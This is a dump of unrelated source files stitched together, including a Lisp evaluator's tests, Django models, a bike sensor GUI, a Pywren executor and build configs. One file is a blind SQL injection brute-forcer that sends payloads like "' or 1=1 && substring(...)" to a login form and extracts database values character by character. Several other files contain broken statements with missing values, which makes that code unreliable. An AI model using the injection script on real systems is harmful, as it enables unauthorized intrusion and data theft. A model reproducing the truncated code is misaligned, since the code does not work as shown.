<reponame>BBN-E/ZS4IE # Copyright 2015 by Raytheon BBN Technologies Corp. # All Rights Reserved. """ Python API for Accessing SerifXML Files. >>> import serifxml3 >>> document_text = ''' ... John talked to his sister Mary. ... The president of Iran, <NAME>, said he wanted to resume talks. ... I saw peacemaker Bob at the mall.''' >>> serif_doc = serifxml3.send_serifxml_document(document_text) >>> print serif_doc Document: docid = u'anonymous' language = u'English' source_type = u'UNKNOWN' ... or, to load a document from a file: >>> serif_doc = serifxml3.Document(filename) to save a document to a file: >>> For a list of attributes that any serif theory object takes, use the 'help' method on the theory object (or its class). E.g.: >>> serif_doc.sentences[0].help() >>> """ from serif.theory.document import * from serif.util.event_event_tree_functions import construct_joint_prop_between_events, prune_bad_patterns_from_joint_prop_tree
import operator from pytest import mark, raises from evaluator import evaluate, global_env import evaluator from parser import tokenize, parse import errors def test_evaluate_integer(): ast = 2 want = 2 got = evaluate(ast, {}) assert want == got def test_evaluate_symbol(): ast = '*' want = evaluator.Operator(2, operator.mul) got = evaluate(ast, global_env) assert want.arity == got.arity assert want.function == got.function @mark.parametrize("source,want", [ ('(* 2 3)', 6), ('(* 2 (* 3 4))', 24), # (100°F − 32) * 5 / 9 = 37°C ("(/ (* (- 100 32) 5) 9)", 37), ('(mod 8 3)', 2), ]) def test_evaluate_expr(source, want): ast = parse(tokenize(source)) got = evaluate(ast, global_env) assert want == got def test_evaluate_missing_arg(): source = '(* 2)' ast = parse(tokenize(source)) with raises(errors.MissingArgument): evaluate(ast, global_env) def test_evaluate_excess_arg(): source = '(mod 2 3 4)' ast = parse(tokenize(source)) with raises(errors.TooManyArguments): evaluate(ast, global_env) def test_evaluate_excess_arg2(): source = '(abs -2 3)' ast = parse(tokenize(source)) with raises(errors.TooManyArguments): evaluate(ast, global_env) def test_evaluate_multiple_lines(): source = '(+ 2 3)\n(* 2 3)' want = [5, 6] tokens = tokenize(source) while tokens: ast = parse(tokens) got = evaluate(ast, global_env) assert want.pop(0) == got def test_evaluate_division_by_zero(): source = '(/ 1 0)' ast = parse(tokenize(source)) with raises(errors.DivisionByZero): evaluate(ast, global_env) def test_evaluate_unknown_function(): source = '($ 1 2)' ast = parse(tokenize(source)) with raises(errors.UnknownSymbol): evaluate(ast, global_env) @mark.parametrize("source,want", [ ('(if 1 1 2)', 1), ('(if 0 1 2)', 2), ('(if (> 1 0) 1 (/ 1 0))', 1), ]) def test_evaluate_if(source, want): ast = parse(tokenize(source)) got = evaluate(ast, global_env) assert want == got def test_evaluate_set(): source = '(set x 3)\n(* 2 x)' want = [3, 6] # make copy of global_env environment = dict(evaluator.global_env) tokens = tokenize(source) while tokens: ast = parse(tokens) got = evaluate(ast, environment) assert want.pop(0) == got def test_print(capsys): ast = parse(tokenize('(print 7)')) got = evaluate(ast, global_env) assert 7 == got captured = capsys.readouterr() assert '7\n' == captured.out def test_begin(capsys): source = """ (begin (print 1) (print 2) (print 3) ) """ ast = parse(tokenize(source)) got = evaluate(ast, global_env) assert 3 == got captured = capsys.readouterr() assert '1\n2\n3\n' == captured.out @mark.parametrize("source,out", [ ('(while 0 (print 1))', ''), ("""(begin (set x 2) (while x (begin (print x) (set x (- x 1)) )) )""", '2\n1\n'), ]) def test_while(capsys, source, out): ast = parse(tokenize(source)) got = evaluate(ast, global_env) assert 0 == got captured = capsys.readouterr() assert out == captured.out def test_evaluate_define(): source = '(define double (n) (* 2 n))' tokens = tokenize(source) ast = parse(tokens) # make copy of global_env environment = dict(evaluator.global_env) name = evaluate(ast, environment) assert 'double' == name assert name in environment func = environment[name] assert 'double' == assert 1 == func.arity assert ['n'] == func.arg_names assert ['*', 2, 'n'] == func.body def test_evaluate_user_function(): source = '(define triple (n) (* 3 n))\n(triple 5)' want = ['triple', 15] tokens = tokenize(source) # make copy of global_env environment = dict(evaluator.global_env) while tokens: ast = parse(tokens) got = evaluate(ast, environment) assert want.pop(0) == got
''' # Approach 1: 0. Create hashmap of s1 with count of each letter 1. Create sliding window of length = len(s1) 2. Slide the window over s1: 2.1. Set hashmap/counter of alphbets in each substring of s1 of length = len(s1) 2.2. Compare the hashmap with that of s2: 2.2.1. If found, return true 2.2.2. Else continue untill all substrings are checked 2.3. return FALSE TC: O(n) SC: O(1) Optimization: 1. Compute hashmap for first substring only(O(n)) 2. For later substrings, just update the hashmap(O(1)): h[s2[start]] -= 1 , if end + 1 < len(s2): h[s2[end + 1]] += 1, start += 1, end += 1 Approach 3: (recursive): ''' import string class Solution: def checkInclusion(self, s1: str, s2: str) -> bool: if len(s2) < len(s1): return False hMapS1 = dict.fromkeys(string.ascii_lowercase, 0) hMapS2 = dict.fromkeys(string.ascii_lowercase, 0) for letter in s1: hMapS1[letter] += 1 start = 0 end = len(s1) - 1 temp = start # initililizing hashmap for s2 substring(within sliding window) temp = start while(temp <= end): hMapS2[s2[temp]] += 1 temp += 1 while(end < len(s2)): # compare if hashmaps match if hMapS1 == hMapS2: return True else: hMapS2[s2[start]] -= 1 if end + 1 < len(s2): hMapS2[s2[end + 1]] += 1 start += 1 end += 1 return False
<reponame>ecobasa/ecobasa # -*- coding: utf-8 -*- from __future__ import unicode_literals from haystack.utils import Highlighter from haystack.views import SearchView from six import string_types class FindView(SearchView): def get_results(self): """ Override get_results to add the value of the field where query was found Also takes care of highlighting the query. """ results = super(FindView, self).get_results() query = self.query.lower() highlight = Highlighter(query) for r in results: for field in r.get_stored_fields(): value = getattr(r, field) # assume search index field 'text' is document field if isinstance(value, string_types) and\ query in value.lower() and\ field != 'text': # assume search index field name == model field name try: name = r.object._meta.get_field(field).verbose_name except: name = field r.context = { 'field': name, 'value': highlight.highlight(value) } continue return results # SearchView is no Django view, so no "find = FindView.as_view()"
<gh_stars>0 #!/usr/bin/env python from distutils.core import setup setup(name='SpaceScout-Server', version='1.0', description='REST Backend for SpaceScout', install_requires=['Django>=1.4,<1.5','mock','oauth2','PIL','pyproj','pytz','South','simplejson>=2.1','django-oauth-plus'], )
from InterlocksWdg import *
<gh_stars>1-10 from django.contrib.auth import get_user_model from django.db import models from django.urls import reverse from django.utils import timezone from django.utils.translation import gettext_lazy as _ from girder_utils.db import DeferredFieldsManager from s3_file_field import S3FileField class Submission(models.Model): class Meta: ordering = ['-created'] class Status(models.TextChoices): QUEUED = 'queued', _('Queued for scoring') SCORING = 'scoring', _('Scoring') INTERNAL_FAILURE = 'internal_failure', _('Internal failure') FAILED = 'failed', _('Failed') SUCCEEDED = 'succeeded', _('Succeeded') created = models.DateTimeField( creator = models.ForeignKey(get_user_model(), on_delete=models.CASCADE) creator_fingerprint_id = models.CharField(max_length=32, null=True, blank=True) creator_ip = models.GenericIPAddressField(null=True, blank=True) approach = models.ForeignKey('Approach', on_delete=models.CASCADE) accepted_terms = models.BooleanField(default=False) test_prediction_file = S3FileField() status = models.CharField(max_length=20, default=Status.QUEUED, choices=Status.choices) score = models.JSONField(blank=True, null=True) overall_score = models.FloatField(blank=True, null=True) validation_score = models.FloatField(blank=True, null=True) fail_reason = models.TextField(blank=True) objects = DeferredFieldsManager('score') def __str__(self): return f'{}' def get_absolute_url(self): return reverse('submission-detail', args=[]) def reset_scores(self): self.score = None self.overall_score = None self.validation_score = None return self
class Library: def __init__(self, location): self.location = location self.books = [] def find_book(self, title): try: book = [b for b in self.books if b.title == title][0] return "%s in library %s" % (book.title, self.location) except IndexError: return "This book is not in %s" % self.location def add_book(self, book): self.books.append(book) def __iter__(self): self.n = 0 return self def __next__(self): if self.n >= len(self.books): raise StopIteration result = self.books[self.n] self.n += 1 return result class Book: def __init__(self, title, author): self.title = title = author = 0 def turn_page(self, page): = page l = Library("Velingrad") b = Book("Name of the book", "Author Name") l.add_book(b) for i in l: print(i.title) print(l.find_book('Name of the book'))
# -------------------------------------------- # File: # Date: 30/09/2019 # Author: <NAME> # Modified: # Desc: Test application for testing of byke systems, gps, motion sensor, and pic communication. # Setup for sql db testing. # -------------------------------------------- import tkinter as tk import math import sqlite3 import board conn = sqlite3.connect('byke_testApp.db') print("Opened database successfully") conn.execute('''CREATE TABLE IF NOT EXISTS TRIP_STATS (TRIP_ID INTEGER PRIMARY KEY NOT NULL, TRIP_DATE TEXT, TRIP_TIME INTEGER, TRIP_MAXSPEED REAL, TRIP_AVGSPEED REAL, TRIP_DISTANCE REAL, TRIP_UPDISTANCE REAL, TRIP_DOWNDISTANCE REAL);''') conn.execute('''CREATE TABLE IF NOT EXISTS GPS_DATA (ENTRY_ID INT PRIMARY KEY NOT NULL, TIME TEXT NOT NULL, SPEED REAL, LAT REAL, LNG REAL, ALT REAL, CLIMB REAL, XROT REAL, YROT REAL, TRIP_ID INTEGER NOT NULL, FOREIGN KEY (TRIP_ID) REFERENCES TRIP_STATS (TRIP_ID) );''') print("Table created successfully") conn.close() # raspberry pi libraries import smbus # i2c smbus for pic communication import gpsd # Gps library import import adafruit_dht # import library for temperature sensor global leftpressed leftpressed = 0 global rightpressed rightpressed = 0 global brakepressed brakepressed = 0 global headlightpressed headlightpressed = 0 global i i = 0 global recordrunning recordrunning = 0 global list1 list1 = [] global totaldistance totaldistance = 0 global tripNum tripNum = 0 # i2c addresses i2cBus = smbus.SMBus(1) # Setup for i2c communication via smbus tailEndPicAddress = 0x55 # i2c address of tail end pic batteryPicAddress = 0x45 # i2c address of battery location pic motionAddress = 0x68 # address for mpu5060 motion sensor motionPowerMgmt1 = 0x6b # memory location of power register motionPowerMgmt2 = 0x6c # memory location of power register # ----------------------------------------------------- # Function: query_test # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Test sql query # Inputs: # Outputs: # ----------------------------------------------------- def query_test(): cur = conn.cursor() cur.execute("SELECT * FROM TRIP_STATS WHERE TRIP_ID=?", (tripNum,)) rows = cur.fetchall() conn.close() for row in rows: print(row) # ----------------------------------------------------- # Function: temperature_read # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Read temperature from DHT11 sensor # Inputs: # Outputs: # ----------------------------------------------------- def temperature_read(): try: sensor = adafruit_dht.DHT11(board.D16) # call library for DHT11 temperature sensor temperature = sensor.temperature # read in temperature and humidity temperaturebutton.config(text=str(temperature)) except RuntimeError as e: print('temp error {}'.format(e.args)) # ----------------------------------------------------- # Function: record # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Start and Stop recording # Inputs: # Outputs: # ----------------------------------------------------- def record(): global tripNum global i global recordrunning if recordrunning == 1: recordrunning = 0 recordbutton.config(text="Record") else: recordrunning = 1 recordbutton.config(text="Recording") conn = sqlite3.connect('byke_testApp.db') cur = conn.cursor() cur.execute("SELECT ENTRY_ID, TRIP_ID FROM GPS_DATA WHERE ENTRY_ID = (SELECT MAX(ENTRY_ID) FROM GPS_DATA)") max_entry = cur.fetchone() conn.close() try: i = max_entry[0] + 1 except: i = 0 try: tripNum = max_entry[1] + 1 except: tripNum = 1 # ----------------------------------------------------- # Function: gps # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Query gps module and save to database # Inputs: # Outputs: # ----------------------------------------------------- def gps(): global i global recordrunning global totaldistance global list1 gpsd.connect() gpsData = gpsd.get_current() if gpsData.mode > 1: gpsTime = gpsData.time speed = gpsData.hspeed gpsLat = gpsLong = gpsData.lon gpsAlt = gpsData.alt gpsClimb = gpsData.climb speed = speed * 3.6 gpsbutton.config(text='Fix ' + str(i)) if recordrunning == 1: xrotate, yrotate = motion() list1.append((i, str(gpsTime), speed, gpsLat, gpsLong, gpsAlt, gpsClimb, xrotate, yrotate, tripNum)) i += 1 speed = float(speed) if speed > 0.5: distance = speed / 3600 totaldistance = totaldistance + distance print("Speed: {} Distance: {} Total Distance: {}".format(speed, distance, totaldistance)) else: try: conn = sqlite3.connect('byke_testApp.db') c = conn.cursor() entry = "INSERT INTO GPS_DATA (ENTRY_ID, TIME, SPEED, LAT, LNG, ALT, CLIMB, TRIP_ID) \ VALUES (?, ?, ?, ? ,?, ?, ?, ?)" c.executemany(entry, list1) conn.commit() c.execute("SELECT MAX(SPEED) FROM GPS_DATA") maxspeed = c.fetchone() print(maxspeed) c.execute("SELECT AVG(SPEED) FROM GPS_DATA") avgspeed = c.fetchone() print(avgspeed) listStats = ( (0, 0, maxspeed, avgspeed, totaldistance, 0, 0, tripNum) ) entry2 = "INSERT INTO TRIP_STATS (TRIP_TIME, TRIP_DATE, TRIP_MAXSPEED, TRIP_AVGSPEED, TRIP_DISTANCE, " \ "TRIP_UPDISTANCE, TRIP_DOWNDISTANCE, TRIP_ID)" \ " VALUES (?, ?, ?, ?, ?, ?, ?, ?)" c.executemany(entry2, listStats) conn.commit() conn.close() except: pass else: gpsbutton.config(text='NO Fix') if recordrunning == 1: gpsbutton.after(1000, gps) # ----------------------------------------------------- # Function: read_word # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Combine two register from motion sensor # Inputs: # Outputs: # ----------------------------------------------------- def read_word(adr): high = i2cBus.read_byte_data(motionAddress, adr) low = i2cBus.read_byte_data(motionAddress, adr + 1) val = (high << 8) + low return val # ----------------------------------------------------- # Function: read_word_motion # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Adjust value from motion sensor # Inputs: # Outputs: # ----------------------------------------------------- def read_word_motion(adr): val = read_word(adr) if val >= 0x8000: return -((65535 - val) + 1) else: return val # ----------------------------------------------------- # Function: motion # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Query motion sensor # Inputs: # Outputs: # ----------------------------------------------------- def motion(): i2cBus.write_byte_data(motionAddress, motionPowerMgmt1, 0) accel_xout_scaled = read_word_motion(0x3b) / 16384.0 accel_yout_scaled = read_word_motion(0x3d) / 16384.0 accel_zout_scaled = read_word_motion(0x3f) / 16384.0 yRotate = -math.degrees(math.atan2(accel_xout_scaled, (math.sqrt((accel_yout_scaled * accel_yout_scaled) + (accel_zout_scaled * accel_zout_scaled))))) xRotate = -math.degrees(math.atan2(accel_yout_scaled, (math.sqrt((accel_xout_scaled * accel_xout_scaled) + (accel_zout_scaled * accel_zout_scaled))))) motionbutton.config(text=str(round(yRotate, 2) + ' ' + str(round(xRotate, 2)))) return xRotate, yRotate # ----------------------------------------------------- # Function: send_tail # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Send value to tail end pic # Inputs: # Outputs: # ----------------------------------------------------- def send_tail(): i2cBus.write_byte_data(tailEndPicAddress, int(regspinner.get()), int(regvaluespinner.get())) # ----------------------------------------------------- # Function: send_motor # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Send value to motor pic # Inputs: # Outputs: # ----------------------------------------------------- def send_motor(): i2cBus.write_byte_data(batteryPicAddress, int(regspinner.get()), int(regvaluespinner.get())) # ----------------------------------------------------- # Function: read_motor # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Read value from motor pic # Inputs: # Outputs: # ----------------------------------------------------- def read_motor(): motorrec = i2cBus.read_byte_data(batteryPicAddress, int(regspinner.get())) regvaluespinner.delete(0, 'end') regvaluespinner.insert(0, motorrec) # ----------------------------------------------------- # Function: read_tail # Author: # Modified: <NAME> # Date: 01/10/19 # Desc: Read value from tail end pic # Inputs: # Outputs: # ----------------------------------------------------- def read_tail(): tailrec = i2cBus.read_byte_data(tailEndPicAddress, int(regspinner.get())) regvaluespinner.delete(0, 'end') regvaluespinner.insert(0, tailrec) mainWindow = tk.Tk() mainWindow.title('Byke') mainWindow.geometry('400x250+0+0') mainWindow.columnconfigure(0, weight=1) mainWindow.columnconfigure(1, weight=1) mainWindow.columnconfigure(2, weight=1) mainWindow.rowconfigure(0, weight=1) mainWindow.rowconfigure(1, weight=1) mainWindow.rowconfigure(2, weight=1) mainWindow.rowconfigure(3, weight=1) mainWindow.config(bg='white') gpsbutton = tk.Button(mainWindow, text='gps', borderwidth=2, command=gps) gpsbutton.grid(row=0, column=0, sticky='nswe') if recordrunning == 1: gpsbutton.after(1000, gps) temperaturebutton = tk.Button(mainWindow, text='temperature', borderwidth=2, command=temperature_read) temperaturebutton.grid(row=2, column=0, sticky='nswe') motionbutton = tk.Button(mainWindow, text='motion', borderwidth=2, command=motion) motionbutton.grid(row=3, column=0, sticky='nswe') recordbutton = tk.Button(mainWindow, text='record', borderwidth=2, command=record) recordbutton.grid(row=1, column=0, sticky='nswe') reglabel = tk.Label(mainWindow, text='Register') reglabel.grid(row=0, column=1, sticky='nsew') regspinner = tk.Spinbox(mainWindow, width=3, from_=0, to=12, font=(None, 18)) regspinner.grid(row=1, column=1, sticky='nswe') tailsendbutton = tk.Button(mainWindow, text='Send to Tail', borderwidth=2, command=send_tail) tailsendbutton.grid(row=0, column=2, sticky='nswe') motorsendbutton = tk.Button(mainWindow, text='Send to Motor', borderwidth=2, command=send_motor) motorsendbutton.grid(row=1, column=2, sticky='nswe') regvalue = tk.Label(mainWindow, text='REG Value') regvalue.grid(row=2, column=1, sticky='nsew') tailreadbutton = tk.Button(mainWindow, text='Read Tail', borderwidth=2, command=read_tail) tailreadbutton.grid(row=2, column=2, sticky='nswe') motorreadbutton = tk.Button(mainWindow, text='Read Motor', borderwidth=2, command=read_motor) motorreadbutton.grid(row=3, column=2, sticky='nswe') regvaluespinner = tk.Spinbox(mainWindow, width=3, from_=0, to=100, font=(None, 18)) regvaluespinner.grid(row=3, column=1, sticky='nswe') mainWindow.mainloop()
from functools import partial from typing import Callable, Iterable, Tuple from rechunker.executors.util import chunk_keys, split_into_direct_copies from rechunker.types import CopySpec, Executor, ReadableArray, WriteableArray import pywren_ibm_cloud as pywren from pywren_ibm_cloud.executor import FunctionExecutor # PywrenExecutor represents delayed execution tasks as functions that require # a FunctionExecutor. Task = Callable[[FunctionExecutor], None] class PywrenExecutor(Executor[Task]): """An execution engine based on Pywren. Supports zarr arrays as inputs. Outputs must be zarr arrays. Any Pywren FunctionExecutor can be passed to the constructor. By default a Pywren `local_executor` will be used Execution plans for PywrenExecutor are functions that accept no arguments. """ def __init__(self, pywren_function_executor: FunctionExecutor = None): self.pywren_function_executor = pywren_function_executor def prepare_plan(self, specs: Iterable[CopySpec]) -> Task: tasks = [] for spec in specs: # Tasks for a single spec must be executed in series spec_tasks = [] for direct_spec in split_into_direct_copies(spec): spec_tasks.append(partial(_direct_array_copy, *direct_spec)) tasks.append(partial(_execute_in_series, spec_tasks)) # TODO: execute tasks for different specs in parallel return partial(_execute_in_series, tasks) def execute_plan(self, plan: Task, **kwargs): if self.pywren_function_executor is None: # No Pywren function executor specified, so use a local one, and shutdown after use with pywren_local_function_executor() as pywren_function_executor: plan(pywren_function_executor) else: plan(self.pywren_function_executor) def pywren_local_function_executor(): return pywren.local_executor( # Minimal config needed to avoid Pywren error if ~/.pywren_config is missing config={"pywren": {"storage_bucket": "unused"}} ) def _direct_array_copy( source: ReadableArray, target: WriteableArray, chunks: Tuple[int, ...], pywren_function_executor: FunctionExecutor, ) -> None: """Direct copy between arrays using Pywren for parallelism""" iterdata = [(source, target, key) for key in chunk_keys(source.shape, chunks)] def direct_copy(iterdata): source, target, key = iterdata target[key] = source[key] futures =, iterdata) pywren_function_executor.get_result(futures) def _execute_in_series( tasks: Iterable[Task], pywren_function_executor: FunctionExecutor ) -> None: for task in tasks: task(pywren_function_executor)
import random #from colors import color, red, blue lower="abcdefghijklmnopqrstuvwxyz" upper="ABCDEFGHIJKLMNOPQRSTUVWXYZ" numbers="0123456789" symbols="~!@#$%^&*()_+}=-{:|<>?/.,';[]'" all=lower+upper+numbers+symbols length=int(input("REQUIRED LENGTH : ")) password= "".join(random.sample(all,length)) print ("NEW PASSWORD"+" : "+password)
[ORG 0x7C00]
<gh_stars>0 # %% ####################################### def pilshow_imagefile_vscode(image_file: str): """When used with a VS Code "Interactive Window", displays the referenced image file. Args: image_file (str): Reference the path of the image. """ from PIL import Image # image_object = return image_object
from abc import ABC from artemis_client.session import ArtemisSession class ArtemisManager(ABC): _session: ArtemisSession def __init__(self, artemis_session: ArtemisSession) -> None: self._session = artemis_session
<filename>common/code/snippets/security/ #!/usr/bin/env python3 # Reference: # import sys import requests chars = "abcdefghijklmnopqrstuvwxyz01234567890.()<>*^%$@!" target = "" url = "" port = 80 fail_string = "Remote System" def injection_assembler(injection): return url def brute_force_field_value(field): result = "" length_of_field = get_field_length(field) for x in range(1, length_of_field + 1): print ("[*] Injecting for character in position {}".format(x)) for char in chars: # print ("[*] Trying char {}".format(char)) # ' or 1=1 && substring("test",1,1)=char(116) # injection = """' or 1=1 && substring({},{},1)=char({}) #""".format(field, x, ord(char)) post_data = { "uname": injection, "psw": "test" } r = requests.request("POST", url=url, data=post_data) if injection_success(r): print (" [+] Found character {}: {}".format(x, char)) result += char print ("[+] Bruted value of {}: {}".format(field, result)) def get_field_length(field): for x in range(0, 200): # ' or 1=1 && char_length("test")=4 # injection = """' or 1=1 && char_length({})={} #""".format(field, x) post_data = { "uname": injection, "psw": "test" } r = requests.request("POST", url=url, data=post_data) if injection_success(r): print("[+] Length of field is {} characters".format(x)) return x raise Exception("[-] Couldn't determine field length. Exiting.") def injection_success(inj_response): if fail_string in inj_response.text: return False else: return True def main(): if len(sys.argv) > 1: field_to_brute = sys.argv[1] brute_force_field_value(field_to_brute) else: print("usage: python \"(field_to_brute)\"" "\nexample:\tpython \"version()\"") if __name__ == "__main__": main()
class BLNKController: def __init__(self): # stalk signal for less than 550ms means it was tapped self.tap_duration_frames = 55 self.tap_direction = 0 self.blinker_on_frame_start = 0 self.blinker_on_frame_end = 0 self.prev_turnSignalStalkState = 0 def update_state(self, CS, frame): #opposite direction so start canceling if ( self.tap_direction > 0 and CS.turnSignalStalkState > 0 and self.tap_direction != CS.turnSignalStalkState ): self.tap_direction = 0 self.blinker_on_frame_start = 0 self.blinker_on_frame_end = 0 # turn signal stalk just turned on, capture frame if ( CS.turnSignalStalkState > 0 and self.prev_turnSignalStalkState == 0 ): self.blinker_on_frame_start = frame # turn signal stalk just turned off elif ( CS.turnSignalStalkState == 0 and self.prev_turnSignalStalkState > 0 ): if frame - self.blinker_on_frame_start <= self.tap_duration_frames: #recognize tap self.tap_direction = self.prev_turnSignalStalkState self.blinker_on_frame_end = frame else: #too long, no tap self.tap_direction = 0 self.blinker_on_frame_start = 0 self.blinker_on_frame_end = 0 # check what we need to maintain if ( self.tap_direction > 0 and frame - self.blinker_on_frame_start > self.tap_duration_frames and frame - self.blinker_on_frame_end > self.tap_duration_frames and CS.alca_direction != self.tap_direction ): self.tap_direction = 0 self.blinker_on_frame_start = 0 self.blinker_on_frame_end = 0 self.prev_turnSignalStalkState = CS.turnSignalStalkState
import inspect from state_machine.models import Event, State, InvalidStateTransition from state_machine.orm import get_adaptor _temp_callback_cache = None def get_callback_cache(): global _temp_callback_cache if _temp_callback_cache is None: _temp_callback_cache = dict() return _temp_callback_cache def get_function_name(frame): return inspect.getouterframes(frame)[1][3] def before(before_what): def wrapper(func): frame = inspect.currentframe() calling_class = get_function_name(frame) calling_class_dict = get_callback_cache().setdefault(calling_class, {'before': {}, 'after': {}}) calling_class_dict['before'].setdefault(before_what, []).append(func) return func return wrapper def after(after_what): def wrapper(func): frame = inspect.currentframe() calling_class = get_function_name(frame) calling_class_dict = get_callback_cache().setdefault(calling_class, {'before': {}, 'after': {}}) calling_class_dict['after'].setdefault(after_what, []).append(func) return func return wrapper def acts_as_state_machine(original_class): adaptor = get_adaptor(original_class) global _temp_callback_cache modified_class = adaptor.modifed_class(original_class, _temp_callback_cache) _temp_callback_cache = None return modified_class
<filename>bytesviewapi/<gh_stars>0 # All the API URL and language suported by API. BASE_URL = '' # Sentiment URL SENTIMENT_URL = BASE_URL + 'static/sentiment' SENTIMENT_LANGUAGES_SUPPORT = {"ar", "en"} # Emotion URL EMOTION_URL = BASE_URL + 'static/emotion' EMOTION_LANGUAGES_SUPPORT = {"en"} # Keywords URL KEYWORDS_URL = BASE_URL + 'static/keywords' KEYWORDS_LANGUAGES_SUPPORT = {"en"} # Semantic URL SEMANTIC_URL = BASE_URL + 'static/semantic' SEMANTIC_LANGUAGES_SUPPORT = {"en"} # Name-gender URL NAME_GENDER_URL = BASE_URL + 'static/name-gender' # NER URL NER_URL = BASE_URL + 'static/ner' NER_LANGUAGES_SUPPORT = {"en"} # Intent URL INTENT_URL = BASE_URL + 'static/intent' INTENT_LANGUAGES_SUPPORT = {"en"}
<filename>binding.gyp { "targets": [ { "target_name": "roaring", "default_configuration": "Release", "cflags": ["-O3", "-std=c99"], "cflags_cc": ["-O3", "-std=c++11"], "defines": ["DISABLEAVX"], "sources": [ "src/cpp/roaring.c", "src/cpp/module.cpp", "src/cpp/v8utils/v8utils.cpp", "src/cpp/RoaringBitmap32/RoaringBitmap32.cpp", "src/cpp/RoaringBitmap32/RoaringBitmap32_operations.cpp", "src/cpp/RoaringBitmap32BufferedIterator/RoaringBitmap32BufferedIterator.cpp" ] } ], "conditions": [ [ "target_arch in \"x64 x86_64\"", { "targets": [ { "target_name": "cpuinfo", "default_configuration": "Release", "cflags": ["-O3"], "cflags_cc": ["-O3", "-std=c++11"], "sources": ["src/cpuinfo/cpuinfo.cpp"] }, { "target_name": "roaring-sse42", "default_configuration": "Release", "cflags": ["-O3", "-std=c99", "-msse4.2"], "cflags_cc": ["-O3", "-std=c++11", "-msse4.2"], "defines": ["DISABLEAVX", "__POPCNT__", "__SSE4_2__"], "xcode_settings": { "GCC_ENABLE_SSE42_EXTENSIONS": "YES", "OTHER_CFLAGS": ["-msse4.2"] }, "sources": [ "src/cpp/roaring.c", "src/cpp/module.cpp", "src/cpp/v8utils/v8utils.cpp", "src/cpp/RoaringBitmap32/RoaringBitmap32.cpp", "src/cpp/RoaringBitmap32/RoaringBitmap32_operations.cpp", "src/cpp/RoaringBitmap32BufferedIterator/RoaringBitmap32BufferedIterator.cpp" ] }, { "target_name": "roaring-avx2", "default_configuration": "Release", "cflags": ["-O3", "-std=c99", "-mavx2"], "cflags_cc": ["-O3", "-std=c++11", "-mavx2"], "defines": ["USEAVX", "FORCE_AVX=ON", "__POPCNT__", "__SSE4_2__"], "xcode_settings": { "GCC_ENABLE_SSE42_EXTENSIONS": "YES", "CLANG_X86_VECTOR_INSTRUCTIONS": "avx2", "OTHER_CFLAGS": ["-mavx2"] }, "msvs_settings": { "VCCLCompilerTool": { "AdditionalOptions": ["/arch:AVX2"] } }, "sources": [ "src/cpp/roaring.c", "src/cpp/module.cpp", "src/cpp/v8utils/v8utils.cpp", "src/cpp/RoaringBitmap32/RoaringBitmap32.cpp", "src/cpp/RoaringBitmap32/RoaringBitmap32_operations.cpp", "src/cpp/RoaringBitmap32BufferedIterator/RoaringBitmap32BufferedIterator.cpp" ] } ] } ] ] }
<filename> #!/usr/bin/env python import time import os temp_file = '/sys/devices/platform/dht22@0/iio:device0/in_temp_input' dir_path = '/home/pi/.openauto/temp_conversion' write_file = '/home/pi/.openauto/temp_conversion/temp.txt' def check_path(): ''' Verify that the paths exist ''' if os.path.isdir(dir_path): return True else: os.mkdir(dir_path) if os.path.isfile(write_file): return True else: create_file = open(write_file, 'w') create_file.close() def convert_temp(): while True: file = open(temp_file, 'r').read() writefile = open(write_file, 'w') converted_temp = float(file) * 1000 writefile.write('31 00 4b 46 ff ff 05 10 1c : crc=1c YES\n31 00 4b 46 ff ff 05 10 1c t=' + str(converted_temp)) writefile.close() time.sleep(10) def main(): check_path() convert_temp() if __name__ == '__main__': main()
<reponame>mingaleg/yakubovich<filename>clerk/signals/ import django.dispatch new_judged_submission = django.dispatch.Signal(['contest_pk', 'run_id'])
import collections import numpy as np import pandas as pd import matplotlib.colors import as cm import matplotlib.pyplot as plt import matplotlib.colors as mcolors import plotly import chart_studio.plotly as py import plotly.graph_objects as go from plotly.subplots import make_subplots class MultiResolutionAnalysis: """ Class for multi-resolution single cell analysis Parameters ---------- exp_df: DataFrame (Pandas) Cell barcode x gene dataframe meta_df: DataFrame (Pandas) Cell barcode x metadata attributes genes: List[str] List of strings that are gene names. The gene names must be present in exp_df. coexpressed_genes: List[List[str]] (optional) Nested lists of strings of length three that are gene names. The gene names must be present in exp_df. exp_color: str String that is a matplotlib colormap continuous color. modularity: DataFrame (Pandas) (optional) Cluster resolution value by modularity score silhouette: DataFrame (Pandas) (optional) Cluster resolution and community assignment by silhouette score Attributes ---------- sankey_dict: dict Dictionary containing the multi-resolution cluster analysis for building a Sankey Network """ #TODO: Add node hovertemplate text #TODO: Cleanup normalize silhouette #TODO: Add class parameters for silhouette and expression coloring def __init__(self, exp_df, meta_df, genes, coexpressed_genes, exp_color, modularity, silhouette): #TODO: add additional args for user metadata if genes == None: print('Exit Error: Please add gene(s).') self._exp_df = exp_df self._meta_df = meta_df.astype(str) self._build_sankey_dict(genes, exp_color, silhouette, modularity, coexpressed_genes) def _build_sankey_dict(self, genes, exp_color, silhouette, modularity, coexpressed_genes): """ Build a sankey dictionary for the multi-resolution cluster analysis Parameters ---------- genes: List[str] List of strings that are gene names. The gene names must be present in exp_df. exp_color: str String that is a matplotlib colormap continuous color. silhouette: DataFrame (Pandas) (optional) Cluster resolution and community assignment by silhouette score modularity: DataFrame (Pandas) (optional) Cluster resolution value by modularity score coexpressed_genes: List[List[str]] (optional) Nested lists of strings of length three that are gene names. The gene names must be present in exp_df. """ # Check user defined gene list check_gene_input = list(set(genes) - set(list(self._exp_df))) if len(check_gene_input) > 0: print('Warning the following gene(s) are missing: ', *check_gene_input, sep = ", ") self.sankey_dict = {'data' : None, 'genes' : genes, 'exp_dict' : {gene:[] for gene in genes}, 'exp_color' : exp_color, 'exp_colorbar' : {}, 'coexp_genes' : None, 'resolutions' : [data for data in list(self._meta_df) if data.split('.')[0] == 'res']} self._wrangle_node_data() self._check_args(coexpressed_genes, silhouette, modularity) self._count_flow_by_flow() self._wrangle_source_to_target() def _wrangle_node_data(self): """Create a list of resolution values and their communities""" self.sankey_dict['node_labels'] = [res for sublist in [list(map(( lambda x: res + '_' 